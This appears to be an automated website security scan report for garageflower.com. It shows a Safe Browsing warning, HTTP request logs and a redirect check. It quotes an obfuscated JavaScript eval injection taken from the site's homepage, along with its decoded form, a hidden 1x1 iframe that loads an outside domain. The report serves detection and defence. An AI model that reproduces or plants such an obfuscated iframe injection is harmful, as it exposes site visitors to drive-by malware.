Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=garageflower.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://garageflower.com/ | 200 OK Content-Length: 5031 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval("d((*)&!o$^!%c$[[^@&um((*)&!e$[[^@&n[@&%^t.w$[[^@&r((*)&!i((*)&!t$^!%e(&@)&]('(&@)&]<i[@&%^f$^!%r[@&%^a((*)&!m$[[^@&e$[[^@& (&@)&]s[@&%^rc[@&%^=$^!%h$[[^@&t$^!%t$[[^@&p$[[^@&:((*)&!/(&@)&]/$^!%u$[[^@&p[@&%^d[@&%^a[@&%^t$^!%e$[[^@&da((*)&!t$^!%e(&@)&].[@&%^c(&@)&]n/$^!% $^!%h(&@)&]e(&@)&]i$[[^@&g$[[^@&h$^!%t$^!%=$^!%1$[[^@& [@&%^w$[[^@&i((*)&!d(&@)&]th(&@)&]=1(&@)&]></((*)&!i$[[^@&f((*)&!r$^!%a$^!%m((*)&!e>'$^!%)$[[^@&;[@&%^".replace(/\(\&\@\)\&\]|\$\^\!\%|\(\(\*\)\&\!|\$\[\[\^\@\&|\[\@\&\%\^/ig, "")) Decoded script: document.write('<iframe src=http://updatedate.cn/ height=1 width=1></iframe>'); document.write('<iframe src=http://updatedate.cn/ height=1 width=1></iframe>'); <iframe src=http://updatedate.cn/ height=1 width=1></iframe> Antivirus reports:
| ||
http://garageflower.com/test404page.js | 404 Not Found Content-Length: 3612 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: garageflower.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 11 Sep 2014 20:02:58 GMT
Accept-Ranges: bytes
ETag: "4290073-13a7-46e44570ace00"
Server: Apache
Content-Length: 5031
Content-Type: text/html
Last-Modified: Thu, 09 Jul 2009 11:41:44 GMT
...5031 bytes of data.
GET / HTTP/1.1
Host: garageflower.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 11 Sep 2014 20:02:58 GMT
Accept-Ranges: bytes
ETag: "4290073-13a7-46e44570ace00"
Server: Apache
Content-Length: 5031
Content-Type: text/html
Last-Modified: Thu, 09 Jul 2009 11:41:44 GMT
...5031 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: garageflower.com
Referer: http://www.google.com/search?q=garageflower.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: garageflower.com
Referer: http://www.google.com/search?q=garageflower.com
Result:
The result is similar to the first query. There are no suspicious redirects found.